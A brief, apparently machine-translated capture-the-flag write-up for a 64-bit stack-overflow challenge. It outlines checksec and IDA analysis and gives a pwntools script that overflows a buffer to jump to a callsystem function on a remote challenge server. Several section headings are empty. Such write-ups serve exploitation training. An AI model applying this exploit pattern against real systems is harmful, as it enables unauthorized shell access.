Topic analysis
After downloading the file first using checksec check the file protection mechanism
File name is too long, it changes a bit
A 64-bit program is found, the use of pseudo-code view ida
We noticed a special function name callsystem
OK idea, direct stack overflow
collect message
Determining an offset
/ Bin / sh address
method 1
Method 2
Scripting
from pwn import *
p = remote('111.198.29.45',32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()
Local test
Drone test